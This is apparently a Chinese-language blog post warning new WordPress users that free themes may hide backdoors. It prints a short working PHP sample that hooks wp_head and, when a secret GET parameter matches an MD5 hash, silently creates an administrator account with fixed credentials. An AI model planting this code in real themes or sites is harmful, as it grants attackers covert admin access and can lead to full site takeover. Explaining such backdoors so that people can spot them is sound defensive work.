关于wordpress主题的后门代码

前言

有一些刚刚接触wordpress的新手们,总是喜欢到网上去找一些免费主题,却不知道这些主题很有可能藏有后门,可以轻松的获取你的网站权限,从而获取非法利益,所以我在这里要提醒一下那些新手们,找主题一定要找正版的,如果是免费版,最好是在github有开源项目的主题,这样在一定程度上都会减少遇到后门的几率。

示例

下面给大家带来一个常见的后门代码,先声明一下,本站分享的任何主题都不会包含后门代码,可以以我的人格担保,我并没有那么恶心!!!

add_action( 'wp_head', 'my_backdoor' );
function my_backdoor() {
    if ( md5( $_GET['backdoor'] ) == 'b0f455571f6ae6c30e7521e9bf00b4f2' ) {
        require( 'wp-includes/registration.php' );
        if ( !username_exists( 'mr_admin' ) ) {
            $user_id = wp_create_user( 'xinyewl', 'me' );
            $user = new WP_User( $user_id );
            $user->set_role( 'administrator' );
        }
    }
}

只要php触发了这段代码,进行了请求,你就可以使用你的密码来登陆他的后台了,正常登陆即可获得管理员权限,也就是说,你甚至可以拿到shell,具体不多说,自己领悟。

我这里默认设置的账号密码是

账号:xinyewl 
密码:me

具体怎么使用,我不会说的,也是为了避免小学生恶意植入主题。

好了就这样了,千万别拿来做坏事!!!

发表回复

您的电子邮箱地址不会被公开。 必填项已用 * 标注